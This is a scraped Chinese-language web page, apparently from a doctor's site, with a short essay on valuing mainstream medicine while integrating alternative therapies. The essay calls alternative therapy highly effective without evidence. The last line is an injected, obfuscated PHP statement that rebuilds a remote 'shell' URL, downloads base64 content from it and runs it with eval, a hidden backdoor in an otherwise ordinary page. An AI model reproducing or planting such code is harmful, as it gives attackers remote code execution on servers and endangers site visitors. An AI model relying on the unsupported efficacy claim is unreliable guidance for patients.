收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 主流與另類關係微妙
主流與另類關係微妙 列印 E-mail

肯定主流醫學的價值

        你可能會問我,為什麼「另類療法」如此有效,我還要讓我哥哥跟父親花時間去主流醫學走一遭,好似徒勞無功之後,才著手為他們治療?

我是接受主流醫學、西醫教育而成的專業醫師,即便我從事另類醫學近二十年,我仍肯定主流醫學的價值;因為沒有任何一種醫療方法是萬能的!

但是任何一種醫療方法都有其獨到之處!──「Nothing is everything!Everything can be something!」。

所以「如何整合主流醫學與各種不同的另類醫學方法」運用在臨床醫療上,幫助患者在被治療時,能夠得到更完整的照護,是身為醫師的我們一生所應該努力追求的目標。

 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));